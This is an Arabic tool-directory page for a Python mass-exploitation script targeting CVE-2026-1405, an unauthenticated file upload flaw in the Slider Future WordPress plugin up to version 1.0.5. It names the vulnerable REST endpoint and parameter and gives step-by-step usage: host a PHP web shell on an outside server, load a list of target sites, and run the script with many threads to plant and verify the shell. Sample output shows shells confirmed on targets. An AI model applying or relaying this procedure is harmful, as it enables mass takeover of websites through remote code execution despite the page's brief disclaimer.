Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-1405 — Slider Future <= 1.0.5 - رفع ملف تعسفي بدون مصادقة | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2026-1405
توليد الحمولةالاستغلالالبرمجة النصية والأتمتةاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubnxploited/cve-2026-1405

CVE-2026-1405

Slider Future <= 1.0.5 - رفع ملف تعسفي بدون مصادقة

عرض المستودع
411منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-1405

Slider Future <= 1.0.5 - رفع ملفات عشوائية بدون مصادقة

🚀 CVE-2026-1405.py — أداة استغلال جماعي لـ Slider Future

🩸 نظرة عامة على الثغرة

المكوّن: Slider Future (إضافة ووردبريس)
الإصدارات المتأثرة: ≤ 1.0.5
الثغرة: رفع ملفات عشوائية بدون مصادقة
CVE: CVE-2026-1405
درجة CVSS: 9.8 (حرجة)

إضافة Slider Future لووردبريس عرضة لرفع ملفات عشوائية بسبب غياب التحقق من نوع الملف في الدالة slider_future_handle_image_upload في جميع الإصدارات حتى 1.0.5 ضمناً. يتيح ذلك للمهاجمين غير المصادق عليهم رفع أي نوع من الملفات—بما في ذلك قذائف PHP الخبيثة—مباشرة إلى الخادم المتأثر، مما يتيح تنفيذ الأكواد عن بُعد.


⚡ ميزات الاستغلال

  • استغلال جماعي عبر أهداف متعددة.
  • يستخدم نقطة النهاية الضعيفة: /wp-json/slider-future/v1/upload-image/
  • يرفع قذيفة PHP عن بُعد عبر معامل image_url (بدون الحاجة إلى مصادقة).
  • يتحقق تلقائيًا من تنفيذ القذيفة من خلال فحص التواقيع التي يحددها المستخدم.

🛠️ تعليمات الاستخدام

1. جهّز ملفًا نصيًا يحتوي على مواقع ووردبريس المستهدفة (موقع واحد في كل سطر):

root@kitploit:~
http://example1.com
https://example2.com
...

2. استضف قذيفة PHP الخاصة بك على الإنترنت وجهّز رابطها المباشر.

مثال: http://yourserver.com/shell.php

3. شغّل السكربت:

root@kitploit:~
python3 CVE-2026-1405.py

سيُطلب منك:

  • ملف الأهداف: المسار إلى قائمة أهدافك (الافتراضي: list.txt)
  • الرابط المباشر للقذيفة: القذيفة المتاحة على الإنترنت التي تريد رفعها إلى الأهداف
  • توقيع القذيفة: سلسلة نصية فريدة داخل قذيفتك للتحقق (مثال: Nxploited)
  • الخيوط: عدد الخيوط المتوازية (الافتراضي: 10)

4. المخرجات

  • تُعرض نتائج الاستغلال مباشرةً على واجهة احترافية مدعومة بمكتبة Rich.
  • تُحفظ الأهداف الناجحة وروابط القذائف تلقائيًا في success_results.txt.

📝 تفاصيل السكربت

  • الاسم: CVE-2026-1405.py
  • المؤلف: Nxploited
  • اللغة: Python 3
  • المكتبات: requests, rich

كيف يعمل

  1. يرسل طلب POST إلى نقطة النهاية الضعيفة لكل هدف:
    • الرابط: /wp-json/slider-future/v1/upload-image/
    • المعامل: image_url يشير إلى قذيفتك.
  2. يحلل استجابة JSON لاستخراج رابط القذيفة المرفوعة.
  3. يزور رابط القذيفة ويبحث عن سلسلة التوقيع الخاصة بك.
  4. يعرض الحالة: نجاح أو فشل لكل هدف.

⚠️ إخلاء المسؤولية القانوني

هذه الأداة مخصصة لأغراض التعليم واختبار الأمان المصرح به فقط.
الاستخدام غير المصرح به ضد مواقع لا تملكها أو ليس لديك إذن صريح لاختبارها يعد غير قانوني.


💡 مثال على المخرجات

root@kitploit:~
Exploit For: CVE-2026-1405
By: Nxploited

Targets loaded: 12
Shell URL: http://yourserver.com/shell.php
Signature: Nxploited

2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCCESS | Shell Verified: http://target1.com/wp-content/uploads/2026/02/shell.php
2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Upload failed or shell URL not found.
...
Finished: 3/12 succeeded in 14.7s
Saved successes to success_results.txt
تنزيل الأداة